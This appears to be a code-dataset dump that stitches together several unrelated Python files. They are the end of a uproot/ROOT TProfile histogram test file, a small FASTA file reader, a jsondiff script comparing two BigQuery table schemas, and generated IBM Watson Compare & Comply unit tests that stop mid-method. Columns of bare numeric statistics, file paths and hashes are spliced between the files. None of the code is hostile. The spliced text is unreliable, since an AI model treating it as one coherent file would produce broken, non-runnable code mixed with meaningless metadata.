        fTsumwx=-3.5,
        fTsumwx2=26.51,
        fTsumwy=14.0,
        fTsumwy2=178.0,
        fTsumwxy=-66.6,
        fTsumwz=50.0,
        fTsumwz2=900.0,
        fSumw2=np.array(
            [0, 0, 0, 0, 0, 0, 400, 0, 0, 0, 0, 0, 100, 500, 0, 400, 0, 0, 0, 0],
            np.float64,
        ),
        fBinEntries=np.array(
            [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 2, 0, 1, 0, 0, 0, 0], np.float64
        ),
        fBinSumw2=np.array([], np.float64),
        fXaxis=uproot.writing.identify.to_TAxis(
            fName="xaxis",
            fTitle="",
            fNbins=2,
            fXmin=-3.14,
            fXmax=2.71,
        ),
        fYaxis=uproot.writing.identify.to_TAxis(
            fName="yaxis",
            fTitle="",
            fNbins=3,
            fXmin=-5.0,
            fXmax=10.0,
        ),
    )
    with uproot.recreate(newfile) as fout:
        fout["out"] = h1
    f3 = ROOT.TFile(newfile)
    h3 = f3.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 35
    assert h3.GetNbinsX() == 2
    assert h3.GetNbinsY() == 3
    assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
    assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
    assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
    assert [[h3.GetBinContent(i, j) for j in range(5)] for i in range(4)] == [
        pytest.approx([0, 0, 0, 10, 0]),
        pytest.approx([0, 0, 0, 15, 0]),
        pytest.approx([0, 20, 0, 0, 0]),
        pytest.approx([0, 0, 0, 20, 0]),
    ]
    assert [[h3.GetBinError(i, j) for j in range(5)] for i in range(4)] == [
        pytest.approx([0, 0, 0, 0, 0]),
        pytest.approx([0, 0, 0, np.sqrt(12.5), 0]),
        pytest.approx([0, 0, 0, 0, 0]),
        pytest.approx([0, 0, 0, 0, 0]),
    ]
    f3.Close()
def test_ex_nihilo_TProfile3D(tmp_path):
    # Build a TProfile3D directly from its members and verify the averaged
    # [x][y][z] bin grids after reading the file back with ROOT.
    newfile = os.path.join(tmp_path, "newfile.root")
    h1 = uproot.writing.identify.to_TProfile3D(
        fName="h1",
        fTitle="title",
        # Flattened 4x5x3 grid of weight sums, one 20-element z-slab per line;
        # only the middle z bin holds content.
        data=np.array(
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 0, 10, 30, 0, 20, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            np.float64,
        ),
        fEntries=5.0,
        fTsumw=3.0,
        fTsumw2=3.0,
        fTsumwx=-3.5,
        fTsumwx2=26.51,
        fTsumwy=14.0,
        fTsumwy2=178.0,
        fTsumwxy=-66.6,
        fTsumwz=450.0,
        fTsumwz2=67500.0,
        fTsumwxz=-525.0,
        fTsumwyz=2100.0,
        fTsumwt=50.0,
        fTsumwt2=900.0,
        fSumw2=np.array(
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 400, 0, 0, 0, 0, 0, 100, 500, 0, 400, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            np.float64,
        ),
        fBinEntries=np.array(
            [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 2, 0, 1, 0, 0, 0, 0]
            + [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
            np.float64,
        ),
        fBinSumw2=np.array([], np.float64),
        fXaxis=uproot.writing.identify.to_TAxis(
            fName="xaxis",
            fTitle="",
            fNbins=2,
            fXmin=-3.14,
            fXmax=2.71,
        ),
        fYaxis=uproot.writing.identify.to_TAxis(
            fName="yaxis",
            fTitle="",
            fNbins=3,
            fXmin=-5.0,
            fXmax=10.0,
        ),
        fZaxis=uproot.writing.identify.to_TAxis(
            fName="zaxis",
            fTitle="",
            fNbins=1,
            fXmin=100.0,
            fXmax=200.0,
        ),
    )
    with uproot.recreate(newfile) as fout:
        fout["out"] = h1
    f3 = ROOT.TFile(newfile)
    h3 = f3.Get("out")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 35
    assert h3.GetNbinsX() == 2
    assert h3.GetNbinsY() == 3
    assert h3.GetNbinsZ() == 1
    assert h3.GetXaxis().GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetXaxis().GetBinUpEdge(2) == pytest.approx(2.71)
    assert h3.GetYaxis().GetBinLowEdge(1) == pytest.approx(-5)
    assert h3.GetYaxis().GetBinUpEdge(3) == pytest.approx(10)
    assert h3.GetZaxis().GetBinLowEdge(1) == pytest.approx(100)
    assert h3.GetZaxis().GetBinUpEdge(1) == pytest.approx(200)
    approx = pytest.approx
    assert [
        [[h3.GetBinContent(i, j, k) for k in range(3)] for j in range(5)]
        for i in range(4)
    ] == [
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 10, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 15, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 20, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 20, 0], [0, 0, 0]],
    ]
    assert [
        [[h3.GetBinError(i, j, k) for k in range(3)] for j in range(5)]
        for i in range(4)
    ] == [
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, approx(np.sqrt(12.5)), 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
        [[0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0], [0, 0, 0]],
    ]
    f3.Close()
def test_delete(tmp_path):
    """Deleting one key via uproot.update leaves the sibling key intact."""
    newfile = os.path.join(tmp_path, "newfile.root")
    h1 = uproot.writing.identify.to_TH1x(
        fName="h1",
        fTitle="title",
        data=np.array([1.0, 2.0, 5.0, 4.0], np.float64),
        fEntries=5.0,
        fTsumw=7.0,
        fTsumw2=27.0,
        fTsumwx=7.3,
        fTsumwx2=55.67,
        fSumw2=np.array([1.0, 2.0, 25.0, 16.0], np.float64),
        fXaxis=uproot.writing.identify.to_TAxis(
            fName="xaxis",
            fTitle="",
            fNbins=2,
            fXmin=-3.14,
            fXmax=2.71,
        ),
    )
    # Write the same histogram twice, then delete only the first copy.
    with uproot.recreate(newfile) as fout:
        fout["one"] = h1
        fout["two"] = h1
    with uproot.update(newfile) as fin:
        del fin["one"]

    readback = ROOT.TFile(newfile)
    h3 = readback.Get("two")
    assert h3.GetEntries() == 5
    assert h3.GetSumOfWeights() == 7
    assert h3.GetBinLowEdge(1) == pytest.approx(-3.14)
    assert h3.GetBinWidth(1) == pytest.approx((2.71 - -3.14) / 2)
    for i, (c, e) in enumerate(zip([1, 2, 5, 4], [1, 2 ** 0.5, 5, 4])):
        assert h3.GetBinContent(i) == pytest.approx(c)
        assert h3.GetBinError(i) == pytest.approx(e)
    readback.Close()
| 32.679803
| 88
| 0.536592
| 4,034
| 26,536
| 3.505702
| 0.050322
| 0.097157
| 0.126644
| 0.144251
| 0.91748
| 0.908217
| 0.891812
| 0.880851
| 0.872861
| 0.869962
| 0
| 0.131616
| 0.274457
| 26,536
| 811
| 89
| 32.720099
| 0.602919
| 0.003052
| 0
| 0.806407
| 0
| 0
| 0.026046
| 0.001663
| 0
| 0
| 0
| 0
| 0.253482
| 1
| 0.022284
| false
| 0
| 0.009749
| 0
| 0.032033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0bab69de750ef31a4bc0453eff9facff070a36cc
| 2,936
|
py
|
Python
|
bin/fasta_reader.py
|
avoorhis/VAMPS-Upload-Notebook
|
8a72716293a972febc83e28203f0e8426831c72d
|
[
"MIT"
] | null | null | null |
bin/fasta_reader.py
|
avoorhis/VAMPS-Upload-Notebook
|
8a72716293a972febc83e28203f0e8426831c72d
|
[
"MIT"
] | null | null | null |
bin/fasta_reader.py
|
avoorhis/VAMPS-Upload-Notebook
|
8a72716293a972febc83e28203f0e8426831c72d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
############################################################
# #
# Simple script to read a fasta file #
# #
# #
import os
class FastaReader:
    """Sequentially read records from a FASTA file opened in text mode.

    After each successful ``next()`` call, ``id`` holds the defline (without
    the leading '>') and ``seq`` the concatenated sequence lines.

    Bug fix: the original pushed a defline back with
    ``seek(-len(line), os.SEEK_CUR)``, but text-mode files in Python 3 only
    support absolute seeks using cookies returned by ``tell()`` — the old
    code raised on any multi-record file. We now remember ``tell()`` before
    each read and seek back to that absolute position.
    """

    def __init__(self, file_name=None):
        self.file_name = file_name
        self.h = open(self.file_name)
        self.seq = ''
        self.id = None
        self.revcomp_seq = None   # placeholder; never computed here
        self.base_counts = None   # placeholder; never computed here

    def close(self):
        """Close the underlying file handle."""
        self.h.close()

    # Context-manager support so the handle is reliably released.
    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()

    def next(self):
        """Advance to the next record; return True if one was read."""
        self.id = self._read_id()
        self.seq = self._read_seq()
        if self.id:
            return True

    def _read_id(self):
        # The defline is the next line, minus the leading '>'.
        return self.h.readline().strip()[1:]

    def _read_seq(self):
        # Accumulate sequence lines until EOF or the next defline.
        parts = []
        while True:
            pos = self.h.tell()  # cookie for pushing a defline back
            line = self.h.readline()
            if not line:
                break  # EOF
            stripped = line.strip()
            if not stripped:
                continue  # skip blank lines inside/between records
            if line.startswith('>'):
                self.h.seek(pos)  # rewind to the start of the new defline
                break
            parts.append(stripped)
        return ''.join(parts)
class FastaReaderB:
    """Like FastaReader but reads the file in binary mode.

    Bug fix: the original compared binary lines against the str pattern
    ``'>'`` and concatenated bytes onto the str ``''``, both of which raise
    TypeError in Python 3, and it left a stray debug ``print('found')``.
    We now work in bytes throughout and decode only when exposing ``id``
    and ``seq``, so records look the same as FastaReader's.
    """

    def __init__(self, file_name=None):
        self.file_name = file_name
        self.h = open(self.file_name, "rb")
        self.seq = ''
        self.id = None
        self.revcomp_seq = None   # placeholder; never computed here
        self.base_counts = None   # placeholder; never computed here

    def close(self):
        """Close the underlying file handle."""
        self.h.close()

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc, tb):
        self.close()

    def next(self):
        """Advance to the next record; return True if one was read."""
        self.id = self._read_id()
        self.seq = self._read_seq()
        if self.id:
            return True

    def _read_id(self):
        # The defline is the next line, minus the leading b'>'.
        return self.h.readline().strip()[1:].decode()

    def _read_seq(self):
        parts = []
        while True:
            line = self.h.readline()
            if not line:
                break  # EOF
            stripped = line.strip()
            if not stripped:
                continue  # skip blank lines inside/between records
            if line.startswith(b'>'):
                # Binary handles support relative seeks: push the defline back.
                self.h.seek(-len(line), os.SEEK_CUR)
                break
            parts.append(stripped)
        return b''.join(parts).decode()
if __name__ == '__main__':
    # Ad-hoc smoke test: dump every record of a local test file to stdout.
    # Requires 'test25.fa' to exist in the working directory.
    f = FastaReader('test25.fa')
    while f.next():
        id = f.id
        seq = f.seq
        print(id,seq)
| 28.504854
| 63
| 0.36376
| 268
| 2,936
| 3.843284
| 0.242537
| 0.048544
| 0.069903
| 0.066019
| 0.836893
| 0.836893
| 0.836893
| 0.836893
| 0.836893
| 0.836893
| 0
| 0.0036
| 0.526907
| 2,936
| 103
| 64
| 28.504854
| 0.737941
| 0.138283
| 0
| 0.818182
| 0
| 0
| 0.010591
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.121212
| false
| 0
| 0.015152
| 0.030303
| 0.257576
| 0.030303
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
f00737e7860c14cc90edb6cffe7a39edaf8e4029
| 3,187
|
py
|
Python
|
ProtoToBQ/difftest.py
|
LaurensVijnck/ProtoGen
|
6605742c6b3be2868747dbc236392b684410fc85
|
[
"MIT"
] | null | null | null |
ProtoToBQ/difftest.py
|
LaurensVijnck/ProtoGen
|
6605742c6b3be2868747dbc236392b684410fc85
|
[
"MIT"
] | 1
|
2021-03-02T09:06:08.000Z
|
2021-03-02T09:06:08.000Z
|
ProtoToBQ/difftest.py
|
LaurensVijnck/ProtoGen
|
6605742c6b3be2868747dbc236392b684410fc85
|
[
"MIT"
] | null | null | null |
from jsondiff import diff
import json
# Baseline table schema generated for the ".lvi.Event" proto message.
first = {".lvi.Event": {
    "package": "lvi",
    "filename": "event",
    "ambiguous_file_name": True,
    "name": "Event",
    "table_root": True,
    "batch_table": True,
    "cluster_fields": [
        "tenant_id"
    ],
    "time_partitioning": True,
    "partitioning_expiration": 0,
    "partition_field": "event_time",
    "table_name": "event_table",
    "table_description": "ProtoToBQ generated table for events",
    "fields": [
        {
            "index": 1,
            "name": "client",
            "alias": None,
            "description": "Owner of the event",
            "type": "TYPE_MESSAGE",
            "type_value": ".lvi.Client",
            "required": False,
            "batch_field": False,
            "clustering_field": False,
            "partitioning_field": False,
            "timestamp": False,
            "optional_field": False,
            "repeated_field": False,
            "default_value": None
        },
        {
            "index": 2,
            "name": "events",
            "alias": None,
            "description": "",
            "type": "TYPE_MESSAGE",
            "type_value": ".lvi.BatchEvent",
            "required": True,
            "batch_field": True,
            "clustering_field": False,
            "partitioning_field": False,
            "timestamp": False,
            "optional_field": False,
            "repeated_field": True,
            "default_value": None
        },
    ]
}
}
# Modified copy of the schema: field index 2 has "required" flipped to
# False, and an extra field (index 3, otherwise identical to the original
# index-2 field) is appended — exercising both a value change and an
# insertion in the diff.
second = {".lvi.Event": {
    "package": "lvi",
    "filename": "event",
    "ambiguous_file_name": True,
    "name": "Event",
    "table_root": True,
    "batch_table": True,
    "cluster_fields": [
        "tenant_id"
    ],
    "time_partitioning": True,
    "partitioning_expiration": 0,
    "partition_field": "event_time",
    "table_name": "event_table",
    "table_description": "ProtoToBQ generated table for events",
    "fields": [
        {
            "index": 1,
            "name": "client",
            "alias": None,
            "description": "Owner of the event",
            "type": "TYPE_MESSAGE",
            "type_value": ".lvi.Client",
            "required": False,
            "batch_field": False,
            "clustering_field": False,
            "partitioning_field": False,
            "timestamp": False,
            "optional_field": False,
            "repeated_field": False,
            "default_value": None
        },
        {
            "index": 2,
            "name": "events",
            "alias": None,
            "description": "",
            "type": "TYPE_MESSAGE",
            "type_value": ".lvi.BatchEvent",
            "required": False,
            "batch_field": True,
            "clustering_field": False,
            "partitioning_field": False,
            "timestamp": False,
            "optional_field": False,
            "repeated_field": True,
            "default_value": None
        },
        {
            "index": 3,
            "name": "events",
            "alias": None,
            "description": "",
            "type": "TYPE_MESSAGE",
            "type_value": ".lvi.BatchEvent",
            "required": True,
            "batch_field": True,
            "clustering_field": False,
            "partitioning_field": False,
            "timestamp": False,
            "optional_field": False,
            "repeated_field": True,
            "default_value": None
        },
    ]
}
}
# Print the structural difference between the two schemas.
print(diff(first, second))
| 25.701613
| 64
| 0.528397
| 288
| 3,187
| 5.618056
| 0.190972
| 0.117429
| 0.061805
| 0.058714
| 0.954265
| 0.954265
| 0.954265
| 0.954265
| 0.954265
| 0.954265
| 0
| 0.003201
| 0.313775
| 3,187
| 124
| 65
| 25.701613
| 0.736626
| 0
| 0
| 0.818182
| 0
| 0
| 0.440088
| 0.014429
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.016529
| 0
| 0.016529
| 0.008264
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f0228e344a1e472fa975b37f469a6f5dd0245bd7
| 41,781
|
py
|
Python
|
test/unit/test_compare_comply_v1.py
|
BuiQuangAnh/python-sdk
|
f9726a4f74d0a5a3ea901044af8565b4eea4d05e
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_compare_comply_v1.py
|
BuiQuangAnh/python-sdk
|
f9726a4f74d0a5a3ea901044af8565b4eea4d05e
|
[
"Apache-2.0"
] | null | null | null |
test/unit/test_compare_comply_v1.py
|
BuiQuangAnh/python-sdk
|
f9726a4f74d0a5a3ea901044af8565b4eea4d05e
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# (C) Copyright IBM Corp. 2018, 2020.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from ibm_cloud_sdk_core.authenticators.no_auth_authenticator import NoAuthAuthenticator
import inspect
import json
import pytest
import responses
import tempfile
import ibm_watson.compare_comply_v1
from ibm_watson.compare_comply_v1 import *
# Base URL of the Compare & Comply service; every test class below
# registers its mock endpoints under this prefix.
base_url = "https://gateway.watsonplatform.net/compare-comply/api"
##############################################################################
# Start of Service: HTMLConversion
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for convert_to_html
# -----------------------------------------------------------------------------
class TestConvertToHtml:
    """Generated unit tests for CompareComplyV1.convert_to_html."""

    @responses.activate
    def test_convert_to_html_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_HTMLReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_convert_to_html_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_HTMLReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_convert_to_html_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_HTMLReturn_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        return base_url + "/v1/html_conversion"

    def add_mock_response(self, url, response):
        responses.add(responses.POST, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.convert_to_html(**body)

    def construct_full_body(self):
        return {
            "file": tempfile.NamedTemporaryFile(),
            "file_content_type": "string1",
            "model": "string1",
        }

    def construct_required_body(self):
        return {"file": tempfile.NamedTemporaryFile()}
# endregion
##############################################################################
# End of Service: HTMLConversion
##############################################################################
##############################################################################
# Start of Service: ElementClassification
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for classify_elements
# -----------------------------------------------------------------------------
class TestClassifyElements:
    """Generated unit tests for CompareComplyV1.classify_elements."""

    @responses.activate
    def test_classify_elements_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_ClassifyReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_classify_elements_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_ClassifyReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_classify_elements_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_ClassifyReturn_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        return base_url + "/v1/element_classification"

    def add_mock_response(self, url, response):
        responses.add(responses.POST, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.classify_elements(**body)

    def construct_full_body(self):
        return {
            "file": tempfile.NamedTemporaryFile(),
            "file_content_type": "string1",
            "model": "string1",
        }

    def construct_required_body(self):
        return {"file": tempfile.NamedTemporaryFile()}
# endregion
##############################################################################
# End of Service: ElementClassification
##############################################################################
##############################################################################
# Start of Service: Tables
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for extract_tables
# -----------------------------------------------------------------------------
class TestExtractTables:
    """Generated unit tests for CompareComplyV1.extract_tables."""

    @responses.activate
    def test_extract_tables_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_TableReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_extract_tables_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_TableReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_extract_tables_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_TableReturn_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        return base_url + "/v1/tables"

    def add_mock_response(self, url, response):
        responses.add(responses.POST, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.extract_tables(**body)

    def construct_full_body(self):
        return {
            "file": tempfile.NamedTemporaryFile(),
            "file_content_type": "string1",
            "model": "string1",
        }

    def construct_required_body(self):
        return {"file": tempfile.NamedTemporaryFile()}
# endregion
##############################################################################
# End of Service: Tables
##############################################################################
##############################################################################
# Start of Service: Comparison
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for compare_documents
# -----------------------------------------------------------------------------
class TestCompareDocuments:
    """Generated unit tests for CompareComplyV1.compare_documents."""

    @responses.activate
    def test_compare_documents_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_CompareReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_compare_documents_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_CompareReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_compare_documents_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_CompareReturn_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        return base_url + "/v1/comparison"

    def add_mock_response(self, url, response):
        responses.add(responses.POST, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.compare_documents(**body)

    def construct_full_body(self):
        return {
            "file_1": tempfile.NamedTemporaryFile(),
            "file_2": tempfile.NamedTemporaryFile(),
            "file_1_content_type": "string1",
            "file_2_content_type": "string1",
            "file_1_label": "string1",
            "file_2_label": "string1",
            "model": "string1",
        }

    def construct_required_body(self):
        return {
            "file_1": tempfile.NamedTemporaryFile(),
            "file_2": tempfile.NamedTemporaryFile(),
        }
# endregion
##############################################################################
# End of Service: Comparison
##############################################################################
##############################################################################
# Start of Service: Feedback
##############################################################################
# region
# -----------------------------------------------------------------------------
# Test Class for add_feedback
# -----------------------------------------------------------------------------
class TestAddFeedback:
    """Generated unit tests for CompareComplyV1.add_feedback."""

    @responses.activate
    def test_add_feedback_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_FeedbackReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_add_feedback_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_FeedbackReturn_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_add_feedback_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_FeedbackReturn_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        return base_url + "/v1/feedback"

    def add_mock_response(self, url, response):
        responses.add(responses.POST, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.add_feedback(**body)

    def _fake_feedback_body(self):
        # The generator emits identical "full" and "required" payloads for
        # this operation, so both constructors share this helper.
        feedback_json = """{"feedback_type": "fake_feedback_type", "document": {"title": "fake_title", "hash": "fake_hash"}, "model_id": "fake_model_id", "model_version": "fake_model_version", "location": {"begin": 5, "end": 3}, "text": "fake_text", "original_labels": {"types": [], "categories": []}, "updated_labels": {"types": [], "categories": []}}"""
        return {
            "feedback_data": FeedbackDataInput._from_dict(json.loads(feedback_json)),
            "user_id": "string1",
            "comment": "string1",
        }

    def construct_full_body(self):
        return self._fake_feedback_body()

    def construct_required_body(self):
        return self._fake_feedback_body()
# -----------------------------------------------------------------------------
# Test Class for list_feedback
# -----------------------------------------------------------------------------
class TestListFeedback:
    """Generated unit tests for CompareComplyV1.list_feedback."""

    @responses.activate
    def test_list_feedback_response(self):
        # Full payload: every supported query parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_FeedbackList_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_list_feedback_required_response(self):
        # No parameter is required; an empty payload must still call once.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_FeedbackList_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_list_feedback_empty(self):
        # Listing has no required params, so an empty call still succeeds.
        check_empty_response(self)
        assert len(responses.calls) == 1

    # --- helpers ---
    def make_url(self, body):
        return base_url + "/v1/feedback"

    def add_mock_response(self, url, response):
        responses.add(responses.GET, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.list_feedback(**body)

    def construct_full_body(self):
        return {
            "feedback_type": "string1",
            "before": datetime.now().date(),
            "after": datetime.now().date(),
            "document_title": "string1",
            "model_id": "string1",
            "model_version": "string1",
            "category_removed": "string1",
            "category_added": "string1",
            "category_not_changed": "string1",
            "type_removed": "string1",
            "type_added": "string1",
            "type_not_changed": "string1",
            "page_limit": 12345,
            "cursor": "string1",
            "sort": "string1",
            "include_total": True,
        }

    def construct_required_body(self):
        return {}
# -----------------------------------------------------------------------------
# Test Class for get_feedback
# -----------------------------------------------------------------------------
class TestGetFeedback:
    """Generated unit tests for CompareComplyV1.get_feedback."""

    @responses.activate
    def test_get_feedback_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_GetFeedback_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_get_feedback_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_GetFeedback_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_get_feedback_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_GetFeedback_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        # feedback_id is interpolated into the resource path.
        return base_url + "/v1/feedback/{0}".format(body["feedback_id"])

    def add_mock_response(self, url, response):
        responses.add(responses.GET, url, body=json.dumps(response),
                      status=200, content_type="application/json")

    def call_service(self, body):
        service = CompareComplyV1(authenticator=NoAuthAuthenticator(),
                                  version="2018-10-15")
        service.set_service_url(base_url)
        return service.get_feedback(**body)

    def construct_full_body(self):
        return {"feedback_id": "string1", "model": "string1"}

    def construct_required_body(self):
        return {"feedback_id": "string1"}
# -----------------------------------------------------------------------------
# Test Class for delete_feedback
# -----------------------------------------------------------------------------
class TestDeleteFeedback:
    """Generated unit tests for CompareComplyV1.delete_feedback."""

    @responses.activate
    def test_delete_feedback_response(self):
        # Full payload: every supported parameter populated.
        payload = self.construct_full_body()
        send_request(self, payload, fake_response_FeedbackDeleted_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_delete_feedback_required_response(self):
        # Required-only payload must still produce exactly one HTTP call.
        payload = self.construct_required_body()
        send_request(self, payload, fake_response_FeedbackDeleted_json)
        assert len(responses.calls) == 1

    @responses.activate
    def test_delete_feedback_empty(self):
        # Empty or missing required params must fail before any request.
        check_empty_required_params(self, fake_response_FeedbackDeleted_json)
        check_missing_required_params(self)
        assert len(responses.calls) == 0

    # --- helpers ---
    def make_url(self, body):
        # feedback_id is interpolated into the resource path.
        return base_url + "/v1/feedback/{0}".format(body["feedback_id"])

    def add_mock_response(self, url, response):
